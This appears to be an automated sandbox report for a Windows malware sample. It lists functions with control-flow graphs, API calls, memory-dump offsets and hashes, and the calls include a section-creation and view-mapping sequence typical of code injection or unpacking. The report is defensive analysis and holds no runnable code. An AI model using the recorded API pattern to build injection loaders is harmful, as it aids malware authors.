                                                                                                                                                                                                                                        control_flow_graph 274 4015f1-401605 279 401608-401632 call 40125c 274->279 280 4015fb-401601 274->280 286 401634 279->286 287 401637-40163c 279->287 280->279 286->287 289 401642-401653 287->289 290 401959-401961 287->290 293 401957 289->293 294 401659-401682 289->294 290->287 295 401966-4019af call 40125c 290->295 293->295 294->293 303 401688-40169f NtDuplicateObject 294->303 303->293 305 4016a5-4016c9 NtCreateSection 303->305 307 401725-40174b NtCreateSection 305->307 308 4016cb-4016ec NtMapViewOfSection 305->308 307->293 309 401751-401755 307->309 308->307 311 4016ee-40170a NtMapViewOfSection 308->311 309->293 313 40175b-40177c NtMapViewOfSection 309->313 311->307 312 40170c-401722 311->312 312->307 313->293 315 401782-40179e NtMapViewOfSection 313->315 315->293 318 4017a4 call 4017a9 315->318
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                                                                                                                                                        • Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015F5 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 321 4015f5-401605 324 401608-401632 call 40125c 321->324 325 4015fb-401601 321->325 331 401634 324->331 332 401637-40163c 324->332 325->324 331->332 334 401642-401653 332->334 335 401959-401961 332->335 338 401957 334->338 339 401659-401682 334->339 335->332 340 401966-4019af call 40125c 335->340 338->340 339->338 348 401688-40169f NtDuplicateObject 339->348 348->338 350 4016a5-4016c9 NtCreateSection 348->350 352 401725-40174b NtCreateSection 350->352 353 4016cb-4016ec NtMapViewOfSection 350->353 352->338 354 401751-401755 352->354 353->352 356 4016ee-40170a NtMapViewOfSection 353->356 354->338 358 40175b-40177c NtMapViewOfSection 354->358 356->352 357 40170c-401722 356->357 357->352 358->338 360 401782-40179e NtMapViewOfSection 358->360 360->338 363 4017a4 call 4017a9 360->363
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                                                                                                                                                        • Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015F8 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 366 4015f8-401632 call 40125c 374 401634 366->374 375 401637-40163c 366->375 374->375 377 401642-401653 375->377 378 401959-401961 375->378 381 401957 377->381 382 401659-401682 377->382 378->375 383 401966-4019af call 40125c 378->383 381->383 382->381 391 401688-40169f NtDuplicateObject 382->391 391->381 393 4016a5-4016c9 NtCreateSection 391->393 395 401725-40174b NtCreateSection 393->395 396 4016cb-4016ec NtMapViewOfSection 393->396 395->381 397 401751-401755 395->397 396->395 399 4016ee-40170a NtMapViewOfSection 396->399 397->381 401 40175b-40177c NtMapViewOfSection 397->401 399->395 400 40170c-401722 399->400 400->395 401->381 403 401782-40179e NtMapViewOfSection 401->403 403->381 406 4017a4 call 4017a9 403->406
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                                                                                                                                                        • Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040161A Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 409 40161a-401632 call 40125c 415 401634 409->415 416 401637-40163c 409->416 415->416 418 401642-401653 416->418 419 401959-401961 416->419 422 401957 418->422 423 401659-401682 418->423 419->416 424 401966-4019af call 40125c 419->424 422->424 423->422 432 401688-40169f NtDuplicateObject 423->432 432->422 434 4016a5-4016c9 NtCreateSection 432->434 436 401725-40174b NtCreateSection 434->436 437 4016cb-4016ec NtMapViewOfSection 434->437 436->422 438 401751-401755 436->438 437->436 440 4016ee-40170a NtMapViewOfSection 437->440 438->422 442 40175b-40177c NtMapViewOfSection 438->442 440->436 441 40170c-401722 440->441 441->436 442->422 444 401782-40179e NtMapViewOfSection 442->444 444->422 447 4017a4 call 4017a9 444->447
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                                                                                                                                                        • Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00D26829 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 450 d26829-d26842 451 d26844-d26846 450->451 452 d26848 451->452 453 d2684d-d26859 CreateToolhelp32Snapshot 451->453 452->453 454 d2685b-d26861 453->454 455 d26869-d26876 Module32First 453->455 454->455 462 d26863-d26867 454->462 456 d26878-d26879 call d264e8 455->456 457 d2687f-d26887 455->457 460 d2687e 456->460 460->457 462->451 462->455
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00D26851
                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00D26871
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D1F000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d1f000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction ID: d3c8765768713b51eabd2ef0ed4de2c8debd1da21c3415d1d164a79a47c51171
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54F096355007256FEB203BF9B88DB6EB6ECEF59728F540528E656910C0DB70EC454671
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004017DF Relevance: 3.0, APIs: 2, Instructions: 30nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 463 4017df-4017e7 NtMapViewOfSection 465 401782-40179e NtMapViewOfSection 463->465 466 401957-4019af call 40125c 463->466 465->466 468 4017a4 call 4017a9 465->468
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$CreateDuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3617974760-0
                                                                                                                                                                                                                                        • Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                                                                                                                                                        • Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00C2003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 c2003c-c20047 1 c20049 0->1 2 c2004c-c20263 call c20a3f call c20e0f call c20d90 VirtualAlloc 0->2 1->2 17 c20265-c20289 call c20a69 2->17 18 c2028b-c20292 2->18 23 c202ce-c203c2 VirtualProtect call c20cce call c20ce7 17->23 20 c202a1-c202b0 18->20 22 c202b2-c202cc 20->22 20->23 22->20 29 c203d1-c203e0 23->29 30 c203e2-c20437 call c20ce7 29->30 31 c20439-c204b8 VirtualFree 29->31 30->29 33 c205f4-c205fe 31->33 34 c204be-c204cd 31->34 37 c20604-c2060d 33->37 38 c2077f-c20789 33->38 36 c204d3-c204dd 34->36 36->33 40 c204e3-c20505 36->40 37->38 43 c20613-c20637 37->43 41 c207a6-c207b0 38->41 42 c2078b-c207a3 38->42 51 c20517-c20520 40->51 52 c20507-c20515 40->52 44 c207b6-c207cb 41->44 45 c2086e-c208be LoadLibraryA 41->45 42->41 46 c2063e-c20648 43->46 48 c207d2-c207d5 44->48 50 c208c7-c208f9 45->50 46->38 49 c2064e-c2065a 46->49 53 c207d7-c207e0 48->53 54 c20824-c20833 48->54 49->38 55 c20660-c2066a 49->55 56 c20902-c2091d 50->56 57 c208fb-c20901 50->57 58 c20526-c20547 51->58 52->58 59 c207e2 53->59 60 c207e4-c20822 53->60 62 c20839-c2083c 54->62 61 c2067a-c20689 55->61 57->56 63 c2054d-c20550 58->63 59->54 60->48 64 c20750-c2077a 61->64 65 c2068f-c206b2 61->65 62->45 66 c2083e-c20847 62->66 72 c205e0-c205ef 63->72 73 c20556-c2056b 63->73 64->46 67 c206b4-c206ed 65->67 68 c206ef-c206fc 65->68 69 c2084b-c2086c 66->69 70 c20849 66->70 67->68 74 c2074b 68->74 75 c206fe-c20748 68->75 69->62 70->45 72->36 76 c2056f-c2057a 73->76 77 c2056d 73->77 74->61 75->74 80 c2059b-c205bb 76->80 81 c2057c-c20599 76->81 77->72 84 c205bd-c205db 80->84 81->84 84->63
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00C2024D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c20000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction ID: af713af05f6767bfdd6e63742f85cf429c08c8b9d3418dcaade74f2b03fc78c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75527B74A01229DFDB64CF58D984BA8BBB1BF09304F1480DAE54DAB752DB30AE85DF14
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00C20E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 481 c20e0f-c20e24 SetErrorMode * 2 482 c20e26 481->482 483 c20e2b-c20e2c 481->483 482->483
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00C20223,?,?), ref: 00C20E19
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00C20223,?,?), ref: 00C20E1E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c20000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction ID: f2cae72e7842a5b50511a00c30d6182f6d05519fe38a5fabc5f172dd0c837ea9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6D0123114512877D7002A94DC09BCD7B1CDF05B62F108411FB0DD9481C7709A4046E5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019B2 Relevance: 1.3, APIs: 1, Instructions: 65sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 500 4019b2-4019bb 501 4019c3-401a19 call 40125c Sleep call 4014de 500->501 502 4019cd 500->502 514 401a28-401a77 call 40125c 501->514 515 401a1b-401a23 call 4015d5 501->515 502->501 515->514
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                                                                                                                                                        • Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019CC Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 529 4019cc-401a19 call 40125c Sleep call 4014de 543 401a28-401a77 call 40125c 529->543 544 401a1b-401a23 call 4015d5 529->544 544->543
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                                                                                                                                                        • Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019BE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                                                                                                                                                        • Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
